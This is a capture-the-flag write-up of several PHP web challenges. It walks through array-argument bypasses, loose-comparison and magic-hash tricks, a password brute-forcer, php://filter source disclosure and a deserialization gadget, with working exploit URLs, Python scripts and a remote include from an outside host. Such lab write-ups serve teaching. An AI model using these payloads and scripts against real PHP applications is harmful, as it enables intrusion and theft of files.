```php
<?php
$flag = '*********';
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo '<p class="alert">You password must be alphanumeric</p>';
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die($flag);
    else
        echo '<p class="alert">Invalid password</p>';
}
?>
<section class="login">
    <div class="title">
        <a href="./index.phps">View Source</a>
    </div>
    <form method="POST">
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>
```
Exploit the way ereg() and strpos() handle arrays: submit ?password[]=1 (the PHP reads $_GET even though the form posts). Given an array, ereg() emits a warning and returns NULL rather than FALSE, so the `=== FALSE` branch is skipped; strpos() on an array likewise returns NULL, and `NULL !== FALSE` is true, so die($flag) runs. This relies on the PHP 5 behaviour of ereg(), which was removed in PHP 7, and on the pre-PHP 8 habit of returning NULL instead of throwing a TypeError for wrong argument types.
flag{Maybe_using_rexpexp_wasnt_a_clever_move}
Look at the link: the file parameter is base64; it decodes to key.txt, which is of no use. Base64-encode index.php instead, then keep incrementing line to read the source one line at a time.
```php
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='')
    header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
    '0' =>'key.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
    $file_list[2]='thisis_flag.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
```
Set the cookie key=li_lr_480 so that thisis_flag.php is added to the whitelist, then request it with file=base64('thisis_flag.php') and step line through the file:

view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw
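The line-by-line read described above, automated as an added example (this is not code from the original writeup). It models the challenge's index.php offline with a constructed in-memory file set so the loop can be exercised without the site; `http_fetch` is the assumed adapter for the live target. The stop condition is the point worth noticing: PHP's file() keeps each line's newline, so a blank line echoes back as "\n" and only an index past the end, or a file outside the whitelist, echoes back as an empty string.

```python
import base64

# Constructed stand-in for the server's files (the real contents are not on the page).
FAKE_FS = {
    "key.txt": "nothing useful here\n",
    "index.php": "<?php\nerror_reporting(0);\n\n// ... rest of index.php ...\n",
    "thisis_flag.php": "<?php\n$flag = 'flag{constructed_value}';\n",
}


def file_param(name):
    """The value the challenge expects in ?file=: base64 of the file name."""
    return base64.b64encode(name.encode()).decode()


def fake_server(params, cookies):
    """Offline model of the challenge's index.php: same whitelist, same cookie
    check, and echo $fa[$line] where file() keeps each line's trailing newline."""
    name = base64.b64decode(params.get("file", "")).decode("utf-8", "replace")
    try:
        line = int(params.get("line", "") or 0)  # intval(): non-numeric -> 0
    except ValueError:
        line = 0
    allowed = ["key.txt", "index.php"]
    if cookies.get("key") == "li_lr_480":
        allowed.append("thisis_flag.php")
    if name not in allowed:
        return ""
    lines = FAKE_FS[name].splitlines(keepends=True)
    return lines[line] if 0 <= line < len(lines) else ""


def http_fetch(base_url):
    """Return a fetch(params, cookies) callable for the live target (assumed adapter)."""
    import requests  # imported lazily so the offline model runs without it

    def fetch(params, cookies):
        return requests.get(base_url, params=params, cookies=cookies, timeout=10).text

    return fetch


def dump_file(fetch, name, cookies=None, max_lines=10000):
    """Read a whitelisted file one line at a time through ?file=<base64>&line=N.

    A blank line comes back as "\n" (file() keeps newlines); an index past the end
    or a non-whitelisted file comes back as "". So the empty response, not a
    blank-looking one, is the stop condition.
    """
    cookies = cookies or {}
    b64 = file_param(name)
    chunks = []
    for n in range(max_lines):
        chunk = fetch({"file": b64, "line": str(n)}, cookies)
        if chunk == "":
            break
        chunks.append(chunk)
    return "".join(chunks)


if __name__ == "__main__":
    # Against the live site: fetch = http_fetch("http://ctf1.shiyanbar.com/shian-quqi/index.php")
    print(dump_file(fake_server, "thisis_flag.php", {"key": "li_lr_480"}), end="")
```

Without the cookie the same call returns an empty string, because thisis_flag.php never enters the whitelist and in_array() fails before anything is echoed.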
flag{UHGgd3rfH*(3HFhuiEIWF}
```php
<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1'])) {
    $x1 = $_GET['x1'];
    $x1=="1"?die("ha?"):NULL;
    switch ($x1) {
        case 0:
        case 1:
            $a=1;
            break;
    }
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
    }
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?>
```
Final payload:

x1=1a&x2={"x21":"2018a","x22":[[0],0]}&x3=XIPU18570

Why each part passes (PHP 5/7 loose-comparison rules):

- x1=1a: "1a"=="1" is false (two strings, "1a" is not numeric, so they compare as strings), but switch uses ==, and "1a"==0 is true because a non-numeric string converts to 0, so $a=1. PHP 8 changed this rule: 0=="1a" is now false.
- x21="2018a": is_numeric() rejects it, it is truthy, and "2018a">2017 compares as 2018>2017, so $b=1.
- x22=[[0],0]: two elements with an array first; array_search("XIPU", ...) finds the 0 loosely ("XIPU"==0), while the strict === check in the foreach never matches, so $c=1.
- x3=XIPU18570: not '15562', contains XIPU, and substr(md5($x3),8,16) has the form 0e<digits>, which loose == treats as the float 0. This only works because substr(md5('15562'),8,16) has the same 0e form, so both sides compare as 0.
Script to find the x3 value:

```python
import hashlib

# Search 'XIPU' + digits for an md5 whose hex at offset 8 (16 chars) looks like
# "0e<digits>": PHP's loose == then treats that substring as the float 0.
for i in range(1000000):
    s = 'XIPU' + str(i)
    digest = hashlib.md5(s.encode()).hexdigest()
    seg = digest[8:24]
    if seg.startswith('0e') and seg[2:].isdigit():
        print(s)
        break
```
CTF{Php_1s_bstl4_1a}
Hint in the source: <!-- Rumor has it the password is a five-digit number -->

So just brute-force it.
```python
import re
import requests

BASE = "http://ctf1.shiyanbar.com/shian-s/index.php"
s = requests.Session()  # one session, so the captcha stays tied to our cookie


def get_rancode():
    # Pull the captcha out of the page; assumes the first 3-digit run is the code.
    html = s.get(BASE).text
    return re.findall(r'\d\d\d', html)[0]


if __name__ == '__main__':
    for password in range(10000, 100000):  # every five-digit number
        code = get_rancode()  # fetch a fresh code for each attempt
        url = "{}?username=admin&password={}&randcode={}".format(BASE, password, code)
        text = s.get(url).text
        if "flag" in text:
            print(url)
            break
```
What's wrong with the script? It didn't produce anything; I don't get it.
```php
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
```
Read class.php (user points at a remote file containing "the user is admin", file uses the php://filter wrapper so the source comes back base64-encoded instead of being executed):
http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=php://filter/convert.base64-encode/resource=class.php&pass=1
```php
<?php
class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
```
Read index.php the same way:
```php
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
-->
```
Then read the flag through deserialization: the /f1a9/ filter only inspects $file, not $pass, so keep file=class.php (which defines Read) and put the php://filter path for f1a9.php inside a serialized Read object; echo $pass triggers __toString(), which prints the file:
http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1a9.php";}
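Building that pass parameter by hand is error-prone because PHP's serialize() format carries explicit byte lengths (a wrong s:N: makes unserialize() fail silently). The following is an added example, not code from the writeup: a small PHP serializer plus helpers that assemble the request above and decode the base64 that __toString() echoes back. The base URL and the attacker host are assumptions taken from the writeup's own request.

```python
import base64
import re
from urllib.parse import urlencode


class PHPObject:
    """A PHP object to serialize: class name plus public properties, in order."""

    def __init__(self, cls, **props):
        self.cls = cls
        self.props = props


def php_serialize(value):
    """Produce PHP serialize() output for str/int/bool/None/list/dict/PHPObject.

    String lengths are byte counts (PHP strings are byte strings), so non-ASCII
    values are measured after UTF-8 encoding.
    """
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if value is None:
        return "N;"
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in items)
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(v)
                       for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def read_gadget(path):
    """Serialized Read object whose __toString() will file_get_contents(path)."""
    return php_serialize(PHPObject("Read", file=path))


def build_exploit_url(base, user_src, target="f1a9.php"):
    """Assemble the GET request. 'file' stays a plain class.php so the /f1a9/
    check (which only looks at $file) is not triggered; the filtered path goes
    inside the serialized object in 'pass' instead."""
    wrapper = "php://filter/read=convert.base64-encode/resource=" + target
    query = urlencode({"user": user_src, "file": "class.php", "pass": read_gadget(wrapper)})
    return base + "?" + query


def decode_leak(body):
    """Pull the base64 blob that __toString() echoed out of the response and decode it."""
    blobs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not blobs:
        return None
    return base64.b64decode(max(blobs, key=len)).decode("utf-8", "replace")


if __name__ == "__main__":
    # Assumed: the attacker-controlled user_src file contains exactly "the user is admin".
    print(build_exploit_url("http://ctf1.shiyanbar.com/shian-du/index.php",
                            "http://attacker.example/3.txt"))
```

The response body for a successful request is "hello admin!<br>" followed by the base64 of f1a9.php and then "__toString was called!", so decode_leak() takes the longest base64-looking run rather than the first.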
Oh well... the first check could also have been passed with php://input instead of a remote include.
flag_Xd{hSh_ctf:e@syt0g3t}
Note to self: emm.... a contest at this level... really is a waste of time for some people... I feel like I've hit a bottleneck: I can't do the hard contests, and I get very little out of the easy ones. Sigh.... still have to keep learning.